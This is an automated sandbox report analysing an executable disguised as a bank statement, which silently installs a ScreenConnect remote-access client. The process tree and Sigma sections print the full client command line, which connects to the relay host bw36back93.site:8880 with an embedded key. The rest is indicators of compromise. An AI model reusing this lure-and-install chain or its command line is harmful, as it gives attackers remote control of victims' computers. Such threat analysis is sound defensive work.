Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2024-11 eStmt 5563019.exe

Overview

General Information

Sample name:2024-11 eStmt 5563019.exe
Analysis ID:1560600
MD5:cfd5440eaeb5064ac2de9b51eae3ab36
SHA1:525c75f4ce4bda66437086c85330e3a25729f3ae
SHA256:3480dfb2e9fa90eb525178e8dd926ae4a760473e14ca3655e48cd88c8c21ece9
Infos:

Detection

ScreenConnect Tool
Score:46
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • 2024-11 eStmt 5563019.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\2024-11 eStmt 5563019.exe" MD5: CFD5440EAEB5064AC2DE9B51EAE3AB36)
    • msiexec.exe (PID: 7756 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7788 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7832 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4AED0F1D3607922BE2F1EC6832F9BAE3 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7880 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7976 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A5BF5D09ED87785AFA67BD755C799625 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 68F89B22406E06E7C28E4AD1705B01FD E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 8060 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c=" MD5: DC615E9D8EC81CBF2E2452516373E5A0)
    • ScreenConnect.WindowsClient.exe (PID: 8128 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "be299499-1fb7-4c2b-ae20-2cc88daa91a5" "User" MD5: 5DEC65C4047DE914C78816B8663E3602)
    • ScreenConnect.WindowsClient.exe (PID: 7284 cmdline: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "8321ee3f-595b-4e66-bca9-df29533298fb" "System" MD5: 5DEC65C4047DE914C78816B8663E3602)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2024-11 eStmt 5563019.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\6153c6.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Installer\MSI5684.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000000.00000002.1729022620.0000000005860000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000002.1715569033.0000000002F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    8.2.ScreenConnect.WindowsClient.exe.323f880.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      8.0.ScreenConnect.WindowsClient.exe.eb0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        0.2.2024-11 eStmt 5563019.exe.5860000.5.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.0.2024-11 eStmt 5563019.exe.5c63d8.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.2024-11 eStmt 5563019.exe.5860000.5.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c=", ProcessId: 8060, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (d519fd2fdcfe66e7) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7788, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-4DC3-7ACEBCD60FE9}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: 2024-11 eStmt 5563019.exeReversingLabs: Detection: 25%
                              Source: 2024-11 eStmt 5563019.exeVirustotal: Detection: 26%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.1% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_044F15B8 CryptProtectData,7_2_044F15B8
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_044F15B0 CryptProtectData,7_2_044F15B0
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7DA7C CryptUnprotectData,7_2_05E7DA7C
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7F549 CryptUnprotectData,7_2_05E7F549
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7DA62 CryptUnprotectData,7_2_05E7DA62
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7DA74 CryptUnprotectData,7_2_05E7DA74
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_05E7DA5C CryptUnprotectData,7_2_05E7DA5C
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeEXE: msiexec.exeJump to behavior
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: certificate valid
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808027783.0000000000C00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808808896.0000000002581000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808367972.0000000000C72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1744657723.00000000002AD000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: 2024-11 eStmt 5563019.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdbol source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: 2024-11 eStmt 5563019.exe, MSI5684.tmp.2.dr, 6153c7.msi.2.dr, 6153c6.rbs.2.dr, MSI586B.tmp.2.dr, MSI56A4.tmp.2.dr, 6153c5.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: 2024-11 eStmt 5563019.exe, MSI4E28.tmp.1.dr, 6153c7.msi.2.dr, 6153c5.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808118214.0000000000C32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808118214.0000000000C32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: 2024-11 eStmt 5563019.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: 2024-11 eStmt 5563019.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: 2024-11 eStmt 5563019.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 176.123.1.130:8880
                              Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: bw36back93.site
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2969575869.0000000002076000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808808896.0000000002A02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: Microsoft.Deployment.WindowsInstaller.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: Microsoft.Deployment.WindowsInstaller.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: Microsoft.Deployment.WindowsInstaller.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: 2024-11 eStmt 5563019.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: 2024-11 eStmt 5563019.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6153c5.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
